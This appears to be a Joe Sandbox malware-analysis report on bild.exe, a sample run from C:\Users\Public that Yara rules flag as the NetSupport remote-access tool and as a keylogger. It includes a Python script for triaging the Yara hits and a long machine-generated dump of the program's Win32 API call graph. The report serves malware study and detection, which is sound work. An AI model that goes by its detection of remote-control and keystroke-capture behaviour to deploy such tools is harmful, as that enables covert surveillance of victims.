                                                                                    Target ID:11
                                                                                    Start time:11:37:29
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true
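The two bild.exe runs above (Target IDs 10 and 11) each list five Yara hits that are identified only by a dump name. The helper below is an added example, not part of the Joe Sandbox report or of NetSupport: it decodes those dump names against the Imagebase and Path transcribed from the entries, so an analyst can see which hits land inside the dropped bild.exe image (0x4b0000) and which land in a separately mapped module, and which memory regions match more than one rule. Assumptions, labelled in the code: the dump-name field layout beyond the target id (field 0, verifiable as 0x0A = Target ID 10) and address (field 3, verifiable as 0x4B2000 = Imagebase + 0x2000) is not documented on the page, and the 1 MiB image window stands in for the PE's SizeOfImage, which the report does not print.

```python
"""Added triage helper (not part of the Joe Sandbox report): relate the Yara
hits listed for Target IDs 10 and 11 to the processes they were dumped from."""
import re
from collections import defaultdict
from typing import NamedTuple

# Transcribed from the report entries above; only the fields used here are kept.
PROCESSES = {
    10: {"path": r"C:\Users\Public\Netstat\bild.exe", "imagebase": 0x4B0000},
    11: {"path": r"C:\Users\Public\Netstat\bild.exe", "imagebase": 0x4B0000},
}

# The ten "Yara matches" bullets for Target IDs 10 and 11, copied from the report.
YARA_LINES = [
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security",
    "Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security",
]

_YARA_RE = re.compile(
    r"Rule: (?P<rule>[^,]+), Description: (?P<desc>[^,]+), "
    r"Source: (?P<source>[^,]+), Author: (?P<author>.+)"
)


class Finding(NamedTuple):
    target_id: int
    rule: str
    source: str
    address: int
    in_main_image: bool


def parse_dump_name(source: str) -> dict:
    """Split a dump name into its eight hex fields.

    Assumption: the layout is <target id>.<phase>.<serial>.<address>.<four flag
    fields>.sdmp. Only field 0 and field 3 are relied on, and both can be checked
    against the report itself: 0x0A is Target ID 10 and 0x4B2000 lies 0x2000 past
    that process's Imagebase of 0x4b0000.
    """
    parts = source.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected dump name: {source}")
    fields = [int(p, 16) for p in parts[:8]]
    return {"target_id": fields[0], "phase": fields[1], "address": fields[3], "fields": fields}


def triage(yara_lines, processes, image_span: int = 0x100000) -> list:
    """Classify each Yara hit by the process it came from and by whether the dump
    address falls inside that process's main image. image_span is an assumed 1 MiB
    window; the exact bound would be the PE's SizeOfImage, which the report omits."""
    findings = []
    for line in yara_lines:
        m = _YARA_RE.search(line)
        if m is None:
            raise ValueError(f"unparsable Yara line: {line!r}")
        info = parse_dump_name(m["source"])
        base = processes[info["target_id"]]["imagebase"]  # KeyError means an unknown target
        inside = base <= info["address"] < base + image_span
        findings.append(Finding(info["target_id"], m["rule"], m["source"], info["address"], inside))
    return findings


def rules_per_dump(findings) -> dict:
    """Group rules by dump so hits that share one memory region are visible: here
    every Keylogger_Generic hit sits on a region that also matches NetSupport."""
    grouped = defaultdict(set)
    for f in findings:
        grouped[f.source].add(f.rule)
    return {src: sorted(rules) for src, rules in grouped.items()}


def suspicious_path(path: str) -> bool:
    """C:\\Users\\Public is writable by every interactive user; a binary started
    from it (as bild.exe is here) deserves a closer look."""
    return path.lower().startswith("c:\\users\\public\\")


if __name__ == "__main__":
    found = triage(YARA_LINES, PROCESSES)
    for f in found:
        where = "main image" if f.in_main_image else "other module"
        print(f"target {f.target_id:2d} {f.rule:32s} {f.address:#010x} {where}")
    for src, rules in rules_per_dump(found).items():
        if len(rules) > 1:
            print("shared region:", src, rules)
    for tid, proc in PROCESSES.items():
        print(f"target {tid}: suspicious path = {suspicious_path(proc['path'])}")
```

Run against the transcribed lines, four of the ten hits fall at 0x4B2000 inside the bild.exe image (two per run, one from the start-of-process dump and one from the end-of-process dump), the remaining six sit at 0x11193000 or 0x111E1000 in another mapped module, and both Keylogger_Generic hits share their region with a NetSupport hit, which is why they read as NetSupport's own keystroke capture rather than a second implant.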


                                                                                      Execution Graph

                                                                                      Execution Coverage:10.3%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:10.1%
                                                                                      Total number of Nodes:1451
                                                                                      Total number of Limit Nodes:27
                                                                                      execution_graph: interactive call-graph rendering (node and edge listing not reproduced). The node labels that survive name the Win32 APIs reached from the graphed code: dialog and window handling (DialogBoxParamW, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, SendMessageW, GetWindowLongW/SetWindowLongW, PeekMessageW/GetMessageW/TranslateMessage/DispatchMessageW, FindWindowExW, SHAutoComplete), file and directory operations (CreateFileW, CreateDirectoryW, SetEndOfFile, GetFileAttributesW/SetFileAttributesW, DeleteFileW, MoveFileW/MoveFileExW, GetCurrentDirectoryW/SetCurrentDirectoryW, ExpandEnvironmentStringsW, GetFileType, FindClose), shared memory (CreateFileMappingW, MapViewOfFile, UnmapViewOfFile), process launch and environment (ShellExecuteExW, GetCommandLineA/GetCommandLineW, GetModuleFileNameW, GetCurrentProcess, GetProcessAffinityMask, SetThreadExecutionState, Sleep, GetTickCount, GetSystemTime), delay-load import resolution (LoadLibraryExA, GetProcAddress, GetModuleHandleW, VirtualQuery, VirtualProtect, GetSystemInfo, FreeLibrary), and CRT error handling (RaiseException, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetLastError/SetLastError, RtlFreeHeap/RtlReAllocateHeap).
d7fb8a LeaveCriticalSection 23455->23456 23463 d7f930 71 API calls 23455->23463 23456->23453 23458->23449 23458->23450 23460 d7fb88 23460->23456 23461->23447 23462->23458 23463->23460 23464->23396 23465->23403 23466->23399 23467->23404 23469 d7a8e0 GetVersionExW 23468->23469 23470 d77c70 23469->23470 23470->23414 23476 d7c66d __vswprintf_c_l 23471->23476 23472 d7c7b7 23473 d7c7df 23472->23473 23481 d7c5f7 23472->23481 23475 d7f8f2 2 API calls 23473->23475 23478 d7c7ae 23475->23478 23476->23472 23476->23478 23485 d7a791 85 API calls 23476->23485 23486 d877e7 92 API calls 23476->23486 23478->23420 23480->23420 23482 d7c600 23481->23482 23484 d7c651 23481->23484 23483 d80680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23482->23483 23482->23484 23483->23484 23484->23473 23485->23476 23486->23476 23488 d7fca2 23487->23488 23489 d7fc39 EnterCriticalSection 23487->23489 23488->23424 23493 d7fc57 23489->23493 23495 d7fc75 23489->23495 23490 d7f9d1 77 API calls 23492 d7fc8f 23490->23492 23491 d7fc98 LeaveCriticalSection 23491->23488 23492->23491 23493->23495 23496 d7f9d1 23493->23496 23495->23490 23495->23491 23497 d7fdc9 72 API calls 23496->23497 23498 d7f9f3 ReleaseSemaphore 23497->23498 23499 d7fa13 23498->23499 23500 d7fa31 DeleteCriticalSection CloseHandle CloseHandle 23498->23500 23501 d7fac7 70 API calls 23499->23501 23500->23495 23502 d7fa1d CloseHandle 23501->23502 23502->23499 23502->23500 23503->23433 23504->23433 23520 d821e6 23505->23520 23507 d7c658 114 API calls 23515 d85995 ___BuildCatchObject __vswprintf_c_l 23507->23515 23508 d85d67 23538 d83ef1 92 API calls __vswprintf_c_l 23508->23538 23510 d85d77 __vswprintf_c_l 23510->23437 23515->23507 23515->23508 23524 d7fa67 23515->23524 23530 d82b3a 114 API calls 23515->23530 23531 d85db9 114 API calls 23515->23531 23532 d7fdc9 23515->23532 23536 d82593 92 API calls __vswprintf_c_l 23515->23536 23537 d863f2 119 API calls __vswprintf_c_l 23515->23537 23518->23437 23519->23437 
23522 d821f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 23520->23522 23521 d822db 23521->23515 23522->23521 23523 d76e0b 68 API calls 23522->23523 23523->23522 23525 d7fa73 23524->23525 23526 d7fa78 23524->23526 23527 d7fbb1 77 API calls 23525->23527 23528 d7fa91 23526->23528 23529 d7fdc9 72 API calls 23526->23529 23527->23526 23528->23515 23529->23528 23530->23515 23531->23515 23533 d7fde3 ResetEvent ReleaseSemaphore 23532->23533 23534 d7fe0e 23532->23534 23535 d7fac7 70 API calls 23533->23535 23534->23515 23535->23534 23536->23515 23537->23515 23538->23510 23539->23175 23540->23175 23541->23172 23543 d75da6 23542->23543 23588 d75cc5 23543->23588 23545 d75e11 23545->23187 23547 d75dd9 23547->23545 23548 d75e1a 23547->23548 23593 d7a950 CharUpperW CompareStringW CompareStringW 23547->23593 23548->23545 23594 d7f0e1 CompareStringW 23548->23594 23551 d78116 23550->23551 23552 d781b7 CharUpperW 23551->23552 23553 d781ca 23552->23553 23553->23190 23555 d77c20 23554->23555 23556 d77c60 23555->23556 23600 d76f49 67 API calls 23555->23600 23556->23197 23558 d77c58 23601 d76d0d 67 API calls 23558->23601 23561 d79897 2 API calls 23560->23561 23562 d7987d 23561->23562 23563 d79888 23562->23563 23602 d79b6a SetEndOfFile 23562->23602 23563->23225 23566 d79a23 23565->23566 23569 d79a32 23565->23569 23567 d79a29 FlushFileBuffers 23566->23567 23566->23569 23567->23569 23568 d79aab SetFileTime 23568->23254 23569->23568 23570->23179 23571->23182 23572->23209 23573->23197 23574->23197 23575->23195 23576->23212 23577->23202 23578->23212 23579->23222 23580->23224 23581->23250 23582->23250 23583->23250 23584->23250 23585->23248 23586->23249 23587->23204 23595 d75bc2 23588->23595 23590 d75ce6 23590->23547 23592 d75bc2 3 API calls 23592->23590 23593->23547 23594->23545 23596 d75bcc 23595->23596 23598 d75cb4 23596->23598 23599 d7a950 CharUpperW CompareStringW CompareStringW 23596->23599 23598->23590 23598->23592 23599->23596 23600->23558 23601->23556 23602->23563 23605 
d7a27d 23604->23605 23606 d7a30d FindNextFileW 23605->23606 23607 d7a29b FindFirstFileW 23605->23607 23608 d7a32c 23606->23608 23609 d7a318 GetLastError 23606->23609 23610 d7a2b4 23607->23610 23615 d7a2f1 23607->23615 23608->23615 23609->23608 23611 d7b275 2 API calls 23610->23611 23612 d7a2cd 23611->23612 23613 d7a2e6 GetLastError 23612->23613 23614 d7a2d1 FindFirstFileW 23612->23614 23613->23615 23614->23613 23614->23615 23615->23128 23616->22966 23617->22970 23618->22970 23619->22973 23620->22981 23622 d79ba2 67 API calls 23621->23622 23623 d71ee9 23622->23623 23624 d71eed 23623->23624 23625 d719b1 89 API calls 23623->23625 23624->22989 23624->22990 23626 d71efa 23625->23626 23626->23624 23628 d76d0d 67 API calls 23626->23628 23628->23624 23873 d91b40 5 API calls 2 library calls 23839 d89646 92 API calls 23874 d8d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23875 d9d774 IsProcessorFeaturePresent 23654 d8b077 23656 d8b07c 23654->23656 23664 d8aa99 _wcsrchr 23654->23664 23655 d896ec ExpandEnvironmentStringsW 23655->23664 23656->23664 23680 d8b9aa 23656->23680 23658 d8b642 23660 d8ad86 SetWindowTextW 23660->23664 23663 d920de 22 API calls 23663->23664 23664->23655 23664->23658 23664->23660 23664->23663 23672 d8af50 GetDlgItem SetWindowTextW SendMessageW 23664->23672 23674 d8af92 SendMessageW 23664->23674 23678 d8ab6a ___scrt_get_show_window_mode 23664->23678 23679 d80b12 CompareStringW 23664->23679 23703 d88b8e GetCurrentDirectoryW 23664->23703 23704 d7a1a9 7 API calls 23664->23704 23707 d7a132 FindClose 23664->23707 23708 d89844 69 API calls ___std_exception_copy 23664->23708 23666 d8ab77 SetFileAttributesW 23668 d8ac32 GetFileAttributesW 23666->23668 23666->23678 23670 d8ac40 DeleteFileW 23668->23670 23668->23678 23670->23678 23672->23664 23673 d73f5b _swprintf 51 API calls 23675 d8ac75 GetFileAttributesW 23673->23675 23674->23664 23676 d8ac86 MoveFileW 23675->23676 23675->23678 23677 d8ac9e 
MoveFileExW 23676->23677 23676->23678 23677->23678 23678->23664 23678->23666 23678->23668 23678->23673 23705 d7b100 52 API calls 2 library calls 23678->23705 23706 d7a1a9 7 API calls 23678->23706 23679->23664 23682 d8b9b4 ___scrt_get_show_window_mode 23680->23682 23681 d8bc0c 23681->23664 23682->23681 23683 d8ba9f 23682->23683 23709 d80b12 CompareStringW 23682->23709 23685 d79dff 4 API calls 23683->23685 23686 d8bab4 23685->23686 23687 d8bad3 ShellExecuteExW 23686->23687 23710 d7ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23686->23710 23687->23681 23692 d8bae6 23687->23692 23689 d8bacb 23689->23687 23690 d8bb21 23711 d8be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23690->23711 23691 d8bb77 CloseHandle 23693 d8bb85 23691->23693 23695 d8bb90 23691->23695 23692->23690 23692->23691 23694 d8bb1b ShowWindow 23692->23694 23712 d80b12 CompareStringW 23693->23712 23694->23690 23695->23681 23699 d8bc07 ShowWindow 23695->23699 23698 d8bb39 23698->23691 23700 d8bb4c GetExitCodeProcess 23698->23700 23699->23681 23700->23691 23701 d8bb5f 23700->23701 23701->23691 23703->23664 23704->23664 23705->23678 23706->23678 23707->23664 23708->23664 23709->23683 23710->23689 23711->23698 23712->23695 23779 d71067 75 API calls pre_c_initialization 23876 d91f60 RtlUnwind 23809 d88963 GdipDisposeImage GdipFree __except_handler4 22075 d8d611 22076 d8d61d ___scrt_is_nonwritable_in_current_image 22075->22076 22101 d8d126 22076->22101 22078 d8d624 22080 d8d64d 22078->22080 22178 d8da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22078->22178 22089 d8d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22080->22089 22112 d9572c 22080->22112 22084 d8d66c ___scrt_is_nonwritable_in_current_image 22085 d8d6ec 22120 d8db90 22085->22120 22089->22085 22179 d94760 38 API calls 5 library calls 22089->22179 22096 d8d718 22098 d8d721 22096->22098 22180 d94b67 28 API 
calls _abort 22096->22180 22181 d8d29d 13 API calls 2 library calls 22098->22181 22102 d8d12f 22101->22102 22182 d8d8cb IsProcessorFeaturePresent 22102->22182 22104 d8d13b 22183 d90b66 22104->22183 22106 d8d140 22111 d8d144 22106->22111 22192 d955b9 22106->22192 22109 d8d15b 22109->22078 22111->22078 22115 d95743 22112->22115 22113 d8d783 ___delayLoadHelper2@8 5 API calls 22114 d8d666 22113->22114 22114->22084 22116 d956d0 22114->22116 22115->22113 22119 d956ff 22116->22119 22117 d8d783 ___delayLoadHelper2@8 5 API calls 22118 d95728 22117->22118 22118->22089 22119->22117 22242 d8dea0 22120->22242 22123 d8d6f2 22124 d9567d 22123->22124 22244 d98558 22124->22244 22126 d95686 22128 d8d6fb 22126->22128 22248 d988e3 38 API calls 22126->22248 22129 d8c131 22128->22129 22392 d7f353 22129->22392 22133 d8c150 22441 d89036 22133->22441 22135 d8c159 22445 d80722 GetCPInfo 22135->22445 22137 d8c163 ___scrt_get_show_window_mode 22138 d8c176 GetCommandLineW 22137->22138 22139 d8c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22138->22139 22140 d8c185 22138->22140 22141 d73f5b _swprintf 51 API calls 22139->22141 22448 d8a8d4 22140->22448 22143 d8c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 22141->22143 22461 d89a76 LoadBitmapW 22143->22461 22146 d8c1fd 22455 d8be0a 22146->22455 22147 d8c193 OpenFileMappingW 22150 d8c1ac MapViewOfFile 22147->22150 22151 d8c1f3 CloseHandle 22147->22151 22153 d8c1ea UnmapViewOfFile 22150->22153 22154 d8c1bd __vswprintf_c_l 22150->22154 22151->22139 22153->22151 22155 d8be0a 2 API calls 22154->22155 22157 d8c1d9 22155->22157 22156 d8c2b3 22158 d8c2c5 DialogBoxParamW 22156->22158 22157->22153 22159 d8c2ff 22158->22159 22160 d8c318 22159->22160 22161 d8c311 Sleep 22159->22161 22162 d8c326 22160->22162 22486 d89237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22160->22486 22161->22160 22164 d8c345 DeleteObject 22162->22164 22165 d8c35c DeleteObject 22164->22165 22166 d8c35f 22164->22166 22165->22166 22167 
d8c390 22166->22167 22168 d8c3a2 22166->22168 22487 d8be69 WaitForSingleObject PeekMessageW WaitForSingleObject 22167->22487 22484 d8909e 22168->22484 22170 d8c396 CloseHandle 22170->22168 22172 d8c3dc 22173 d94a9b GetModuleHandleW 22172->22173 22174 d8d70e 22173->22174 22174->22096 22175 d94bc4 22174->22175 22656 d94941 22175->22656 22178->22078 22179->22085 22180->22098 22181->22084 22182->22104 22184 d90b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22183->22184 22196 d91c0e 22184->22196 22188 d90b8c 22188->22106 22189 d90b81 22189->22188 22210 d91c4a DeleteCriticalSection 22189->22210 22191 d90b79 22191->22106 22238 d98ac5 22192->22238 22195 d90b8f 8 API calls 3 library calls 22195->22111 22198 d91c17 22196->22198 22199 d91c40 22198->22199 22200 d90b75 22198->22200 22211 d91e85 22198->22211 22216 d91c4a DeleteCriticalSection 22199->22216 22200->22191 22202 d90ca6 22200->22202 22231 d91d9a 22202->22231 22204 d90cb0 22205 d90cbb 22204->22205 22236 d91e48 6 API calls try_get_function 22204->22236 22205->22189 22207 d90cc9 22208 d90cd6 22207->22208 22237 d90cd9 6 API calls ___vcrt_FlsFree 22207->22237 22208->22189 22210->22191 22217 d91c79 22211->22217 22214 d91ea8 22214->22198 22215 d91ebc InitializeCriticalSectionAndSpinCount 22215->22214 22216->22200 22218 d91ca9 22217->22218 22219 d91cad 22217->22219 22218->22219 22222 d91ccd 22218->22222 22224 d91d19 22218->22224 22219->22214 22219->22215 22221 d91cd9 GetProcAddress 22223 d91ce9 __crt_fast_encode_pointer 22221->22223 22222->22219 22222->22221 22223->22219 22225 d91d41 LoadLibraryExW 22224->22225 22226 d91d36 22224->22226 22227 d91d5d GetLastError 22225->22227 22228 d91d75 22225->22228 22226->22218 22227->22228 22230 d91d68 LoadLibraryExW 22227->22230 22228->22226 22229 d91d8c FreeLibrary 22228->22229 22229->22226 22230->22228 22232 d91c79 try_get_function 5 API calls 22231->22232 22233 d91db4 22232->22233 22234 d91dcc TlsAlloc 22233->22234 22235 d91dbd 22233->22235 
22235->22204 22236->22207 22237->22205 22239 d98ade 22238->22239 22240 d8d783 ___delayLoadHelper2@8 5 API calls 22239->22240 22241 d8d14d 22240->22241 22241->22109 22241->22195 22243 d8dba3 GetStartupInfoW 22242->22243 22243->22123 22245 d98561 22244->22245 22246 d9856a 22244->22246 22249 d98457 22245->22249 22246->22126 22248->22126 22250 d9631f pre_c_initialization 38 API calls 22249->22250 22251 d98464 22250->22251 22269 d98576 22251->22269 22253 d9846c 22278 d981eb 22253->22278 22256 d98483 22256->22246 22259 d984c6 22262 d959c2 _free 20 API calls 22259->22262 22262->22256 22263 d984c1 22302 d95e3e 20 API calls __dosmaperr 22263->22302 22265 d9850a 22265->22259 22303 d980c1 26 API calls 22265->22303 22266 d984de 22266->22265 22267 d959c2 _free 20 API calls 22266->22267 22267->22265 22270 d98582 ___scrt_is_nonwritable_in_current_image 22269->22270 22271 d9631f pre_c_initialization 38 API calls 22270->22271 22276 d9858c 22271->22276 22273 d98610 ___scrt_is_nonwritable_in_current_image 22273->22253 22276->22273 22277 d959c2 _free 20 API calls 22276->22277 22304 d95a4a 38 API calls _abort 22276->22304 22305 d976d6 EnterCriticalSection 22276->22305 22306 d98607 LeaveCriticalSection _abort 22276->22306 22277->22276 22279 d92636 __fassign 38 API calls 22278->22279 22280 d981fd 22279->22280 22281 d9820c GetOEMCP 22280->22281 22282 d9821e 22280->22282 22283 d98235 22281->22283 22282->22283 22284 d98223 GetACP 22282->22284 22283->22256 22285 d959fc 22283->22285 22284->22283 22286 d95a3a 22285->22286 22287 d95a0a FindHandlerForForeignException 22285->22287 22308 d95e3e 20 API calls __dosmaperr 22286->22308 22287->22286 22289 d95a25 RtlAllocateHeap 22287->22289 22307 d946ca 7 API calls 2 library calls 22287->22307 22289->22287 22290 d95a38 22289->22290 22290->22259 22292 d98618 22290->22292 22293 d981eb 40 API calls 22292->22293 22294 d98637 22293->22294 22297 d98688 IsValidCodePage 22294->22297 22299 d9863e 22294->22299 22301 d986ad ___scrt_get_show_window_mode 
22294->22301 22295 d8d783 ___delayLoadHelper2@8 5 API calls 22296 d984b9 22295->22296 22296->22263 22296->22266 22298 d9869a GetCPInfo 22297->22298 22297->22299 22298->22299 22298->22301 22299->22295 22309 d982c3 GetCPInfo 22301->22309 22302->22259 22303->22259 22305->22276 22306->22276 22307->22287 22308->22290 22310 d983a7 22309->22310 22311 d982fd 22309->22311 22313 d8d783 ___delayLoadHelper2@8 5 API calls 22310->22313 22319 d993f3 22311->22319 22315 d98453 22313->22315 22315->22299 22318 d975cb __vswprintf_c_l 43 API calls 22318->22310 22320 d92636 __fassign 38 API calls 22319->22320 22321 d99413 MultiByteToWideChar 22320->22321 22323 d99451 22321->22323 22330 d994e9 22321->22330 22326 d959fc __vswprintf_c_l 21 API calls 22323->22326 22331 d99472 __vswprintf_c_l ___scrt_get_show_window_mode 22323->22331 22324 d8d783 ___delayLoadHelper2@8 5 API calls 22327 d9835e 22324->22327 22325 d994e3 22338 d97616 20 API calls _free 22325->22338 22326->22331 22333 d975cb 22327->22333 22329 d994b7 MultiByteToWideChar 22329->22325 22332 d994d3 GetStringTypeW 22329->22332 22330->22324 22331->22325 22331->22329 22332->22325 22334 d92636 __fassign 38 API calls 22333->22334 22335 d975de 22334->22335 22339 d973ae 22335->22339 22338->22330 22341 d973c9 __vswprintf_c_l 22339->22341 22340 d973ef MultiByteToWideChar 22342 d97419 22340->22342 22343 d975a3 22340->22343 22341->22340 22346 d959fc __vswprintf_c_l 21 API calls 22342->22346 22349 d9743a __vswprintf_c_l 22342->22349 22344 d8d783 ___delayLoadHelper2@8 5 API calls 22343->22344 22345 d975b6 22344->22345 22345->22318 22346->22349 22347 d974ef 22375 d97616 20 API calls _free 22347->22375 22348 d97483 MultiByteToWideChar 22348->22347 22350 d9749c 22348->22350 22349->22347 22349->22348 22366 d97a09 22350->22366 22354 d974fe 22356 d959fc __vswprintf_c_l 21 API calls 22354->22356 22359 d9751f __vswprintf_c_l 22354->22359 22355 d974c6 22355->22347 22357 d97a09 __vswprintf_c_l 11 API calls 22355->22357 22356->22359 22357->22347 22358 
d97594 22374 d97616 20 API calls _free 22358->22374 22359->22358 22360 d97a09 __vswprintf_c_l 11 API calls 22359->22360 22362 d97573 22360->22362 22362->22358 22363 d97582 WideCharToMultiByte 22362->22363 22363->22358 22364 d975c2 22363->22364 22376 d97616 20 API calls _free 22364->22376 22377 d97735 22366->22377 22370 d97a79 LCMapStringW 22371 d97a39 22370->22371 22372 d8d783 ___delayLoadHelper2@8 5 API calls 22371->22372 22373 d974b3 22372->22373 22373->22347 22373->22354 22373->22355 22374->22347 22375->22343 22376->22347 22378 d97765 22377->22378 22379 d97761 22377->22379 22378->22371 22384 d97a91 10 API calls 3 library calls 22378->22384 22379->22378 22382 d97785 22379->22382 22385 d977d1 22379->22385 22381 d97791 GetProcAddress 22383 d977a1 __crt_fast_encode_pointer 22381->22383 22382->22378 22382->22381 22383->22378 22384->22370 22386 d977f2 LoadLibraryExW 22385->22386 22390 d977e7 22385->22390 22387 d9780f GetLastError 22386->22387 22388 d97827 22386->22388 22387->22388 22391 d9781a LoadLibraryExW 22387->22391 22389 d9783e FreeLibrary 22388->22389 22388->22390 22389->22390 22390->22379 22391->22388 22488 d8cec0 22392->22488 22395 d7f377 GetProcAddress 22398 d7f3a0 GetProcAddress 22395->22398 22399 d7f390 22395->22399 22396 d7f3c8 22397 d7f6fd GetModuleFileNameW 22396->22397 22499 d9462a 42 API calls __vswprintf_c_l 22396->22499 22410 d7f718 22397->22410 22398->22396 22400 d7f3ac 22398->22400 22399->22398 22400->22396 22402 d7f63b 22402->22397 22403 d7f646 GetModuleFileNameW CreateFileW 22402->22403 22404 d7f675 SetFilePointer 22403->22404 22405 d7f6f1 CloseHandle 22403->22405 22404->22405 22406 d7f685 ReadFile 22404->22406 22405->22397 22406->22405 22408 d7f6a4 22406->22408 22408->22405 22412 d7f309 2 API calls 22408->22412 22411 d7f74d CompareStringW 22410->22411 22413 d7f783 GetFileAttributesW 22410->22413 22414 d7f797 22410->22414 22490 d7a8e0 22410->22490 22493 d7f309 22410->22493 22411->22410 22412->22408 22413->22410 22413->22414 22415 d7f7a4 
22414->22415 22417 d7f7d6 22414->22417 22418 d7f7bc GetFileAttributesW 22415->22418 22420 d7f7d0 22415->22420 22416 d7f8e5 22440 d88b8e GetCurrentDirectoryW 22416->22440 22417->22416 22419 d7a8e0 GetVersionExW 22417->22419 22418->22415 22418->22420 22421 d7f7f0 22419->22421 22420->22417 22422 d7f7f7 22421->22422 22423 d7f85d 22421->22423 22425 d7f309 2 API calls 22422->22425 22424 d73f5b _swprintf 51 API calls 22423->22424 22426 d7f885 AllocConsole 22424->22426 22427 d7f801 22425->22427 22428 d7f892 GetCurrentProcessId AttachConsole 22426->22428 22429 d7f8dd ExitProcess 22426->22429 22430 d7f309 2 API calls 22427->22430 22500 d920b3 22428->22500 22432 d7f80b 22430->22432 22434 d7d142 54 API calls 22432->22434 22433 d7f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 22433->22429 22435 d7f826 22434->22435 22436 d73f5b _swprintf 51 API calls 22435->22436 22437 d7f839 22436->22437 22438 d7d142 54 API calls 22437->22438 22439 d7f848 22438->22439 22439->22429 22440->22133 22442 d7f309 2 API calls 22441->22442 22443 d8904a OleInitialize 22442->22443 22444 d8906d GdiplusStartup SHGetMalloc 22443->22444 22444->22135 22446 d80746 IsDBCSLeadByte 22445->22446 22446->22446 22447 d8075e 22446->22447 22447->22137 22449 d8a8de 22448->22449 22450 d8a9f4 22449->22450 22451 d8a926 CharUpperW 22449->22451 22452 d8a9a9 CharUpperW 22449->22452 22453 d8a94d CharUpperW 22449->22453 22502 d7dfde 73 API calls ___scrt_get_show_window_mode 22449->22502 22450->22146 22450->22147 22451->22449 22452->22449 22453->22449 22456 d8cec0 22455->22456 22457 d8be17 SetEnvironmentVariableW 22456->22457 22459 d8be3a 22457->22459 22458 d8be62 22458->22139 22459->22458 22460 d8be56 SetEnvironmentVariableW 22459->22460 22460->22458 22462 d89aa0 GetObjectW 22461->22462 22463 d89a97 22461->22463 22503 d88ac0 22462->22503 22508 d88bd0 FindResourceW 22463->22508 22467 d89af3 22479 d7caa7 22467->22479 22469 d89ad3 22524 d88b22 GetDC GetDeviceCaps ReleaseDC 22469->22524 22470 d88bd0 13 API calls 22472 d89ac8 
